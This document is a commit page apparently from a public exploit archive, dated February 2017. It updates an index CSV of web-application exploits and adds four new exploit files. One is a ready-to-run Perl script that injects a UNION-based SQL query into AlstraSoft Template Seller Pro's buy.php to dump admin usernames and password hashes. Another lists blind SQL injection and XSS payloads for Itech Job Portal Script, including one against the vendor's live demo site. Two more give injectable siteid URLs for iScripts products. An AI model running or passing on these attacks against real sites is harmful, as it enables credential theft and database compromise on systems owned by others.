DB: 2017-02-06
4 new exploits iScripts EasyCreate CMS 2.0 - Multiple Vulnerabilities iScripts EasyCreate 2.0 - Multiple Vulnerabilities iScripts AutoHoster - /checktransferstatus.php cmbdomain Parameter SQL Injection iScripts AutoHoster - /checktransferstatusbck.php cmbdomain Parameter SQL Injection iScripts AutoHoster - /additionalsettings.php cmbdomain Parameter SQL Injection iScripts AutoHoster - /payinvoiceothers.php invno Parameter SQL Injection iScripts AutoHoster - /support/parser/main_smtp.php Unspecified Traversal iScripts AutoHoster - 'checktransferstatus.php' SQL Injection iScripts AutoHoster - 'checktransferstatusbck.php' SQL Injection iScripts AutoHoster - 'additionalsettings.php' SQL Injection iScripts AutoHoster - 'invno' Parameter SQL Injection iScripts AutoHoster - 'main_smtp.php' Unspecified Traversal Job Portal Script 9.11 - Authentication Bypass Itech Job Portal Script 9.11 - Authentication Bypass Alstrasoft Template Seller Pro 3.25e - 'tempid' Parameter SQL Injection Itech Job Portal Script 9.13 - Multiple Vulnerabilities iScripts AutoHoster 3.0 - 'siteid' Parameter SQL Injection iScripts EasyCreate 3.2 - 'siteid' Parameter SQL Injection
This commit is contained in:
Offensive Security
parent
e07f1ff036
commit
565aa68240
5 changed files with 157 additions and 7 deletions
18
files.csv
18
files.csv
|
|
@ -25548,7 +25548,7 @@ id,file,description,date,author,platform,type,port
|
|||
19185,platforms/hardware/webapps/19185.txt,"Huawei HG866 - Authentication Bypass",2012-06-16,hkm,hardware,webapps,0
|
||||
19187,platforms/php/webapps/19187.txt,"WordPress Plugin Automatic 2.0.3 - SQL Injection",2012-06-16,nick58,php,webapps,0
|
||||
19188,platforms/php/webapps/19188.txt,"Nuked Klan SP CMS 4.5 - SQL Injection",2012-06-16,Vulnerability-Lab,php,webapps,0
|
||||
19189,platforms/php/webapps/19189.txt,"iScripts EasyCreate CMS 2.0 - Multiple Vulnerabilities",2012-06-16,Vulnerability-Lab,php,webapps,0
|
||||
19189,platforms/php/webapps/19189.txt,"iScripts EasyCreate 2.0 - Multiple Vulnerabilities",2012-06-16,Vulnerability-Lab,php,webapps,0
|
||||
19263,platforms/hardware/webapps/19263.txt,"QNAP Turbo NAS 3.6.1 Build 0302T - Multiple Vulnerabilities",2012-06-18,"Sense of Security",hardware,webapps,0
|
||||
19264,platforms/php/webapps/19264.txt,"MyTickets 1.x < 2.0.8 - Blind SQL Injection",2012-06-18,al-swisre,php,webapps,0
|
||||
19292,platforms/php/webapps/19292.txt,"iBoutique eCommerce 4.0 - Multiple Web Vulnerabilities",2012-06-19,Vulnerability-Lab,php,webapps,0
|
||||
|
|
@ -36228,11 +36228,11 @@ id,file,description,date,author,platform,type,port
|
|||
38882,platforms/cgi/webapps/38882.txt,"Icinga - cgi/config.c process_cgivars Function Off-by-One Read Remote Denial of Service",2013-12-16,"DTAG Group Information Security",cgi,webapps,0
|
||||
38883,platforms/asp/webapps/38883.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 - apps/news-events/newdetail.asp id Parameter SQL Injection",2013-12-13,R3d-D3V!L,asp,webapps,0
|
||||
38884,platforms/asp/webapps/38884.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 - 'login.asp' Multiple Field SQL Injection Authentication Bypass",2013-12-13,R3d-D3V!L,asp,webapps,0
|
||||
38885,platforms/php/webapps/38885.txt,"iScripts AutoHoster - /checktransferstatus.php cmbdomain Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0
|
||||
38886,platforms/php/webapps/38886.txt,"iScripts AutoHoster - /checktransferstatusbck.php cmbdomain Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0
|
||||
38887,platforms/php/webapps/38887.txt,"iScripts AutoHoster - /additionalsettings.php cmbdomain Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0
|
||||
38888,platforms/php/webapps/38888.txt,"iScripts AutoHoster - /payinvoiceothers.php invno Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0
|
||||
38889,platforms/php/webapps/38889.txt,"iScripts AutoHoster - /support/parser/main_smtp.php Unspecified Traversal",2013-12-15,i-Hmx,php,webapps,0
|
||||
38885,platforms/php/webapps/38885.txt,"iScripts AutoHoster - 'checktransferstatus.php' SQL Injection",2013-12-15,i-Hmx,php,webapps,0
|
||||
38886,platforms/php/webapps/38886.txt,"iScripts AutoHoster - 'checktransferstatusbck.php' SQL Injection",2013-12-15,i-Hmx,php,webapps,0
|
||||
38887,platforms/php/webapps/38887.txt,"iScripts AutoHoster - 'additionalsettings.php' SQL Injection",2013-12-15,i-Hmx,php,webapps,0
|
||||
38888,platforms/php/webapps/38888.txt,"iScripts AutoHoster - 'invno' Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0
|
||||
38889,platforms/php/webapps/38889.txt,"iScripts AutoHoster - 'main_smtp.php' Unspecified Traversal",2013-12-15,i-Hmx,php,webapps,0
|
||||
38890,platforms/php/webapps/38890.txt,"iScripts AutoHoster - 'tmpid' Parameter Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0
|
||||
38891,platforms/php/webapps/38891.txt,"iScripts AutoHoster - 'fname' Parameter Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0
|
||||
38892,platforms/php/webapps/38892.txt,"iScripts AutoHoster - 'id' Parameter Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0
|
||||
|
|
@ -37021,7 +37021,7 @@ id,file,description,date,author,platform,type,port
|
|||
41017,platforms/hardware/webapps/41017.txt,"Huawei Flybox B660 - Cross-Site Request Forgery",2017-01-10,Vulnerability-Lab,hardware,webapps,0
|
||||
41023,platforms/php/webapps/41023.txt,"Itech Travel Portal Script 9.33 - SQL Injection",2017-01-11,"Ihsan Sencan",php,webapps,0
|
||||
41024,platforms/php/webapps/41024.txt,"Itech Movie Portal Script 7.35 - SQL Injection",2017-01-11,"Ihsan Sencan",php,webapps,0
|
||||
41028,platforms/php/webapps/41028.txt,"Job Portal Script 9.11 - Authentication Bypass",2017-01-12,"Dawid Morawski",php,webapps,0
|
||||
41028,platforms/php/webapps/41028.txt,"Itech Job Portal Script 9.11 - Authentication Bypass",2017-01-12,"Dawid Morawski",php,webapps,0
|
||||
41029,platforms/php/webapps/41029.txt,"Online Food Delivery 2.04 - Authentication Bypass",2017-01-12,"Dawid Morawski",php,webapps,0
|
||||
41032,platforms/php/webapps/41032.pl,"iTechscripts Freelancer Script 5.11 - 'sk' Parameter SQL Injection",2017-01-11,v3n0m,php,webapps,0
|
||||
41033,platforms/hardware/webapps/41033.txt,"D-Link DIR-615 - Multiple Vulnerabilities",2017-01-10,"Osanda Malith",hardware,webapps,0
|
||||
|
|
@ -37176,3 +37176,7 @@ id,file,description,date,author,platform,type,port
|
|||
41245,platforms/php/webapps/41245.html,"Alstrasoft Flippa Clone MarketPlace Script 4.10 - Cross-Site Request Forgery (Add Admin)",2017-02-04,"Ihsan Sencan",php,webapps,0
|
||||
41246,platforms/php/webapps/41246.html,"Alstrasoft FMyLife Pro 1.02 - Cross-Site Request Forgery (Add Admin)",2017-02-04,"Ihsan Sencan",php,webapps,0
|
||||
41247,platforms/php/webapps/41247.txt,"Alstrasoft Forum Pay Per Post Exchange Script 2.01 - SQL Injection",2017-02-04,"Ihsan Sencan",php,webapps,0
|
||||
41249,platforms/php/webapps/41249.pl,"Alstrasoft Template Seller Pro 3.25e - 'tempid' Parameter SQL Injection",2017-02-04,"Ihsan Sencan",php,webapps,0
|
||||
41250,platforms/php/webapps/41250.txt,"Itech Job Portal Script 9.13 - Multiple Vulnerabilities",2017-02-04,Th3GundY,php,webapps,0
|
||||
41251,platforms/php/webapps/41251.txt,"iScripts AutoHoster 3.0 - 'siteid' Parameter SQL Injection",2017-02-04,"Ihsan Sencan",php,webapps,0
|
||||
41252,platforms/php/webapps/41252.txt,"iScripts EasyCreate 3.2 - 'siteid' Parameter SQL Injection",2017-02-04,"Ihsan Sencan",php,webapps,0
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
44
platforms/php/webapps/41249.pl
Executable file
44
platforms/php/webapps/41249.pl
Executable file
|
|
@ -0,0 +1,44 @@
|
|||
#!/usr/bin/perl -w
|
||||
# # # # #
|
||||
# Exploit Title: AlstraSoft Template Seller Pro v3.25e Script (buy.php)- Remote SQL Injection Vulnerability
|
||||
# Google Dork: N/A
|
||||
# Date: 04.02.2017
|
||||
# Vendor Homepage: http://www.alstrasoft.com/
|
||||
# Software Buy: http://www.alstrasoft.com/template.htm
|
||||
# Demo: http://blizsoft.com/templates/
|
||||
# Version: 3.25e
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[beygir]ihsan[nokta]net
|
||||
# # # # #
|
||||
sub clear{
|
||||
system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
|
||||
clear();
|
||||
print "|----------------------------------------------------|\n";
|
||||
print "| Template Seller Pro v3.25e Remote SQL Injector |\n";
|
||||
print "| Author: Ihsan Sencan |\n";
|
||||
print "| Author Web: http://ihsan.net |\n";
|
||||
print "| Mail : ihsan[beygir]ihsan[nokta]net |\n";
|
||||
print "| |\n";
|
||||
print "| |\n";
|
||||
print "|----------------------------------------------------|\n";
|
||||
use LWP::UserAgent;
|
||||
print "\nInsert Target:[http://wwww.site.com/path/]: ";
|
||||
chomp(my $target=<STDIN>);
|
||||
print "\n[!] Exploiting Progress...\n";
|
||||
print "\n";
|
||||
$elicha="group_concat(user_name,char(58),user_password)";
|
||||
$table="UserDB";
|
||||
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
|
||||
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
|
||||
$host = $target . "buy.php?tempid=-1+union+select+1,2,3,".$elicha.",5,6,7,8+from/**/".$table."+--+";
|
||||
$res = $b->request(HTTP::Request->new(GET=>$host));
|
||||
$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
|
||||
print "\n[+] Admin Hash : $1\n";
|
||||
print "[+] Success !!\n";
|
||||
print "\n";
|
||||
}
|
||||
else{print "\n[-]Not found.\n";
|
||||
}
|
||||
66
platforms/php/webapps/41250.txt
Executable file
66
platforms/php/webapps/41250.txt
Executable file
|
|
@ -0,0 +1,66 @@
|
|||
# Exploit Title : Itech Job Portal Script - Multiple Vulnerabilities
|
||||
# Author : Yunus YILDIRIM (Th3GundY)
|
||||
# Team : CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com
|
||||
# Website : http://www.yunus.ninja
|
||||
# Contact : yunusyildirim@protonmail.com
|
||||
|
||||
# Vendor Homepage : http://itechscripts.com/
|
||||
# Software Link : http://itechscripts.com/job-portal-script/
|
||||
# Vuln. Version : 9.13
|
||||
# Demo : http://job-portal.itechscripts.com/
|
||||
|
||||
|
||||
# # # # DETAILS # # # #
|
||||
|
||||
SQL Injections :
|
||||
|
||||
# 1
|
||||
http://localhost/career_advice_details.php?cid=5
|
||||
Parameter: cid (GET)
|
||||
Type: boolean-based blind
|
||||
Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
Payload: cid=5' AND 7504=7504-- zpmu
|
||||
|
||||
Type: AND/OR time-based blind
|
||||
Title: MySQL >= 5.0.12 OR time-based blind (comment)
|
||||
Payload: cid=5' OR SLEEP(5)#
|
||||
|
||||
# 2
|
||||
http://localhost/news_details_us.php?nid=1
|
||||
Parameter: nid (GET)
|
||||
Type: boolean-based blind
|
||||
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
|
||||
Payload: nid=1' RLIKE (SELECT (CASE WHEN (2796=2796) THEN 1 ELSE 0x28 END))-- WmMl
|
||||
|
||||
Type: AND/OR time-based blind
|
||||
Title: MySQL >= 5.0.12 OR time-based blind
|
||||
Payload: nid=1' OR SLEEP(5)-- UoUN
|
||||
|
||||
# # # # # # # # # # # # # # # # # # # # # # # #
|
||||
|
||||
Cross site scriptings (XSS) :
|
||||
|
||||
# 1
|
||||
http://localhost/search_result_alluser.php?function="><svg/onload=prompt('CT-Zer0');>
|
||||
Parameter: function (GET)
|
||||
Payload: "><svg/onload=prompt('CT-Zer0');>
|
||||
|
||||
# 2
|
||||
http://localhost/search_result_alluser.php?ind="><svg/onload=prompt('CT-Zer0');>
|
||||
Parameter: ind (GET)
|
||||
Payload: "><svg/onload=prompt('CT-Zer0');>
|
||||
|
||||
# 3
|
||||
http://localhost/search_result_alluser.php?loc="><svg/onload=prompt('CT-Zer0');>
|
||||
Parameter: loc (GET)
|
||||
Payload: "><svg/onload=prompt('CT-Zer0');>
|
||||
|
||||
# 4
|
||||
http://localhost/search_result_alluser.php?compid="><svg/onload=prompt('CT-Zer0');>
|
||||
Parameter: compid (GET)
|
||||
Payload: "><svg/onload=prompt('CT-Zer0');>
|
||||
|
||||
# 5
|
||||
http://job-portal.itechscripts.com/search_result_alluser.php?days_chk="><svg/onload=prompt('CT-Zer0');>
|
||||
Parameter: days_chk (GET)
|
||||
Payload: "><svg/onload=prompt('CT-Zer0');>
|
||||
18
platforms/php/webapps/41251.txt
Executable file
18
platforms/php/webapps/41251.txt
Executable file
|
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: iScripts AutoHoster v3.0 Script - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 04.02.2017
|
||||
# Vendor Homepage: http://www.iscripts.com/
|
||||
# Software Buy: http://www.iscripts.com/autohoster/
|
||||
# Demo: http://www.demo.iscripts.com/autohoster/demo/
|
||||
# Version: 3.0
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[beygir]ihsan[nokta]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# Login as regular user
|
||||
# http://localhost/[PATH]/websitebuilder/getsitedetails.php?action=editsite&siteid=[SQL]
|
||||
# # # # #
|
||||
18
platforms/php/webapps/41252.txt
Executable file
18
platforms/php/webapps/41252.txt
Executable file
|
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: iScripts EasyCreate v3.2 Script - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 04.02.2017
|
||||
# Vendor Homepage: http://www.iscripts.com/
|
||||
# Software Buy: http://www.iscripts.com/easycreate/
|
||||
# Demo: http://www.demo.iscripts.com/easycreate/demo//
|
||||
# Version: 3.2
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[beygir]ihsan[nokta]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# Login as regular user
|
||||
# http://localhost/[PATH]/getsitedetails.php?action=editsite&siteid=[SQL]
|
||||
# # # # #
|
||||
Loading…
Add table
Reference in a new issue